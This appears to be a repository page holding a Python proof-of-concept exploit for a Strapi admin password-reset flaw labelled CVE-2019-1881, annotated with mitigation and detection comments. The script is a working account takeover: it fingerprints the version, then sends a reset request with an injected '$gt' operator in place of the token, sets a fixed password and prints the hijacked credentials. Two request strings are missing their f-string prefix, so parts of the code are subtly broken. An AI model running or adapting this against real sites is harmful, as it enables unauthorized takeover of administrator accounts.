README.md not found for CVE-2019-1881. The file may not exist in the repository.
POC / exploit.py PY
#Author Kynda
#01/01/2020

import requests, sys, json

# Fixed password that pass_reset() submits as the new credential and later
# prints to stdout. Because the value is published with this script, an
# account found with this password should be treated as reset by a third
# party and have its credentials rotated.
NEW_PASS = "Shadawks123*"

# Exactly two positional arguments (base URL, account e-mail) are required;
# any other count exits with the usage message before a request is sent.
if len(sys.argv) != 3:
    sys.exit("[ ! ] Usage: python3 exploit.py <url> <email>")

def isVuln(version):
    """Return True when ``version`` starts with a 3.0.0 alpha or beta prefix.

    NOTE(review): this is a plain prefix match, so every 3.0.0 pre-release is
    reported as affected, including any pre-release that already carries the
    fix. For triage, compare against the fixed release named in the vendor
    advisory rather than relying on this result alone.
    """
    affected_prefixes = ('3.0.0-beta', '3.0.0-alpha')
    # str.startswith accepts a tuple and returns a bool, matching the
    # original True/False results.
    return version.startswith(affected_prefixes)

def get_version(url):
    """Print whether the Strapi version reported by ``url`` matches isVuln().

    Reads ``/admin/init`` first and falls back to ``/admin/strapiVersion``
    when the expected keys are missing. Both requests are sent without
    credentials, so a deployment that answers them discloses its version to
    any client; restricting or removing that disclosure limits fingerprinting.

    The result is only printed: nothing is returned, and a "not vulnerable"
    verdict does not stop the caller.
    """
    vulnerable_msg = "[ + ] Target version is vulnerable."
    not_vulnerable_msg = "[ - ] Target version is not vulnerable."
    unknown_msg = "[ - ] Can't find Strapi Version."

    print("[ + ] Checking Strapi Version")
    # A non-JSON body from this first endpoint is not handled here and
    # propagates to the caller, as in the original.
    init_doc = requests.get(f"{url}/admin/init").json()
    try:
        reported = init_doc['data']['strapiVersion']
    except KeyError:
        pass
    else:
        print(vulnerable_msg if isVuln(reported) else not_vulnerable_msg)
        return

    # Fallback endpoint: a missing key or a non-JSON body both mean the
    # version could not be determined.
    try:
        legacy_doc = requests.get(f"{url}/admin/strapiVersion").json()
        reported = legacy_doc['strapiVersion']
    except KeyError:
        print(unknown_msg)
        return
    except json.decoder.JSONDecodeError:
        print(unknown_msg)
        return
    print(vulnerable_msg if isVuln(reported) else not_vulnerable_msg)

def pass_reset(url, email):
    """Submit a password-reset body whose ``code`` is an operator object.

    Posts ``params`` to ``{url}/admin/auth/reset-password`` and treats a JSON
    response containing ``jwt`` as success. A response without ``jwt``, or a
    body that is not JSON, exits with "Website is not vulnerable."

    Defensive notes:
      * ``code`` is sent as ``{"$gt": 0}`` rather than a string token.
        Presumably the server passes this value into its database lookup
        unchanged, so the comparison matches a stored code instead of
        proving knowledge of it. Confirm against the vendor advisory.
      * Mitigation is on the server: reject any reset request whose ``code``
        is not a string before it reaches the query layer, and upgrade to a
        fixed release.
      * Detection: a reset-password request body in which ``code`` is a JSON
        object is not something a normal client sends, so it can be alerted
        on in application or WAF logs.
    """
    # Reset submission: the new password is the module-level NEW_PASS, and
    # `code` carries a comparison operator in place of the e-mailed token.
    params = {
        "code": {"$gt":0},
        "password": NEW_PASS,
        "passwordConfirmation": NEW_PASS
    }
    payload = {"email": email, "url":"{url}/admin/plugins/users-permissions/auth/reset-password"}
    # The return value of this first request is discarded.
    requests.post("{url}/", json=payload)
    try:
        r = requests.post(f"{url}/admin/auth/reset-password", json=params).json()
        # A `jwt` field in the response is the script's only success signal.
        if "jwt" not in r:
            sys.exit("[ - ] Website is not vulnerable.")
        # The response also carries the account's username and e-mail, which
        # are echoed together with the new password.
        print(f"[ + ] Password reset successfull.\nUsername: {r['user']['username']}\nEmail: {r['user']['email']}\nPassword: {NEW_PASS}")
    except json.decoder.JSONDecodeError:
        sys.exit("[ - ] Website is not vulnerable.")

# Drop a single trailing slash so the f-string paths built from `url` do not
# contain a double slash.
url = sys.argv[1][:-1] if sys.argv[1].endswith('/') else sys.argv[1]
email = sys.argv[2]
# get_version() only prints its verdict; pass_reset() runs regardless of it.
get_version(url)
pass_reset(url, email)